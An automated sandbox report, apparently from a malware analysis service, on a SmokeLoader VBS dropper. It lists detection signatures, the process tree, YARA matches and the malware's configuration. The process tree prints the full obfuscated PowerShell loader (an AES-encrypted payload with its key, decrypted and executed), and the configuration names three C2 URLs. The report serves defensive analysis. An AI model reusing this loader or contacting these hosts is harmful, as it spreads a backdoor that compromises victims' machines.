Edit tour
Windows
Analysis Report
#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs
Overview
General Information
| Sample name: | #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsrenamed because original name is a hash value |
| Original sample name: | i ii.vbs |
| Analysis ID: | 1578027 |
| MD5: | 4c2a534b731225c4afa0409c6c16ae19 |
| SHA1: | 97c5cf1b10a2036a0f897883d00bcf11b3c8a93c |
| SHA256: | 06fe27eb26975a1cb680fff55f815be29e440a0f2312dbc93171f6aa822fb441 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
SmokeLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 2068 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\#U041 f#U043b#U0 430#U0442i #U0436#U04 3d#U0430 i #U043d#U04 41#U0442#U 0440#U0443 #U043a#U04 46i#U044f. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6012 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction kzVl ($BRaA){re turn -spli t ($BRaA - replace '. .', '0x$& ')};$Qiyjc = kzVl('5 83A9978E4D 34538992E1 A1351EF94C 76F346575A EA09EB5134 0154916187 7EAF16C217 FA53FAF8E9 F5A6B6C98F 436132CD64 686F84B385 701DF5CB57 A496A57D08 3A739BD167 A16F223867 79010D0352 280C205381 DB165BF369 C1DDC1AB0B 20826DFB01 0CFDDCDFA3 710E79E1F0 DF5396A3CD CB1519A0E5 9214CB85DD 8D5DB3598F 5C3CC2D230 7A104A5856 E89829E0A8 0D0286C7C0 0A59C98572 83FBDB29EB 8E496DD4C0 9DA9F27596 0328E5AC89 D55EBD3DCF ED16A96B68 82267D9DCB B1521E1A44 EEC3CE3DA7 0C185B6D12 547011407D 8226CD2AE3 CE2F55821F 81B446119C 95B163DB7D C61D936658 509E877C1C 06861FB636 1BE198E404 AE7F361887 E373DC1A99 E729EA6BCA D34C16C098 676CBD7B34 C34B4F6155 0179835948 76DAC6BDB2 C587F4A232 BC97779B63 E1A9088C50 429F113E05 3CF31D6547 C6D7F0ABE1 2F1F0B6A3F 596803EBE6 9B5D5A6D11 79C28BCAA9 89E167C59B 3FF802844C BD654C0D67 40476BF8F4 5699EB7ADB 664C116B89 504C4839F9 98A91C64E5 E71E61B290 61402831AA C2A34042CD 38B595CF64 B56303C0B9 F31CEFD6C1 F6AFD8BEDD EA69D470D2 A173FC1496 F22674C355 9B74CED02F 1DCEC4DABB 38BA293DA8 F762959B7D DA301EEA24 D6B450354B 04288F6385 A2B2EDB10F A89F0D27FF 2907D00A53 F937FD89AB 58F6811A16 6D5A633234 208A16F44C 7E1FDA1CA5 781750D0FD 0698B225A6 6882E2BC56 217A52CCBF 79E80ED2AB C2CDC80395 11450AF5B1 12EADDA510 CE1EED99D3 EBFDAD959A B50B58880B 9E56EC313C 6B087C011B 3DA810C2A5 E3C6A90C69 061B7B3ECE D35C713C11 874F6763FA 79F0691D4F F8B99159BF 1A716F811E 9CBB8F8182 16B8AEF751 BF044FBFE9 DAA0CB8926 45C05F5D40 7EFED774BA 5689A68FE5 547020C0FE 72F39D5ACA 4');$mZBMz =-join [ch ar[]](([Se curity.Cry ptography. Aes]::Crea te()).Crea teDecrypto r((kzVl('7 2786673574 B4C5168747 16D49544E5 0')),[byte []]::new(1 6)).Transf ormFinalBl ock($Qiyjc ,0,$Qiyjc. Length)); & $mZBMz.S ubstring(0 ,3) $mZBMz .Substring (3) MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 3964 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
putty.exe (PID: 2056 cmdline: "C:\Users\ user\AppDa ta\Roaming \putty.exe " MD5: C02B57E6771A13513DC087F6B45ADAB0) 
explorer.exe (PID: 4084 cmdline: C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
- edrecib (PID: 3976 cmdline:
C:\Users\u ser\AppDat a\Roaming\ edrecib MD5: C02B57E6771A13513DC087F6B45ADAB0)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Click to see the 10 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Click to see the 1 entries | ||||
System Summary |   |
|---|
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: frack113: | ||